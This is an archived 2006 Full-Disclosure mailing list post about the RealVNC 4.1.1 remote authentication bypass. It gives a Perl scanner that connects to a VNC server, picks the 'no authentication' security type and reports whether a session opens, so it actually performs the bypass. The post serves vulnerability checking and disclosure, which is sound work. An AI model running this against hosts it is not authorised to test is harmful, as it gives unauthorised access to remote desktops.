lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <F50FBEAD7A52B8468B9F3C875916681A07D5B6BF@BXCH2K.bjw2k.asg>
Date: Fri May 19 14:07:55 2006
From: tkrpata at bjs.com (Krpata, Tyler)
Subject: RealVNC 4.1.1 Remote Compromise

Here's a real quick vulnerability check in Perl...I think someone else
put out another scanner, but there was no source provided and it wasn't
working right for me.

------------------------------------------------------------------------
--------------------
#!/usr/bin/perl

# scan for OpenVNC 4.11 authentication bypass

use IO::Socket;

$host = $ARGV[0];
$port = $ARGV[1] || 5900;

$host or die("$0 <host> <port>\n");

print "Connecting to $host:$port..."; $| = 1;
($sock = IO::Socket::INET->new(PeerAddr => $host,
                               PeerPort => $port,
                               Proto    => 'tcp',)) ? print "success!\n"
: die("failed\n");


#negotiate protocol
$sock->read($protocol_version,12);
print $sock $protocol_version;
print "Using protocol $protocol_version";

# get security types that we'll be ignoring
$sock->read($security_types,1);
$sock->read($hahaha,unpack('C',$security_types));

# choose no authentication
print $sock "\x01";

# we should get "0000" back
$sock->read($in,4);
if(unpack('I',$in)) { die("Not vulnerable\n") };

# client initialize
print $sock "\x01";

# if the server starts sending data we are in
$sock->read($in,4);
(unpack('I',$in)) ? print("Vulnerable!\n") : die("Not vulnerable\n") ; 

exit;

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ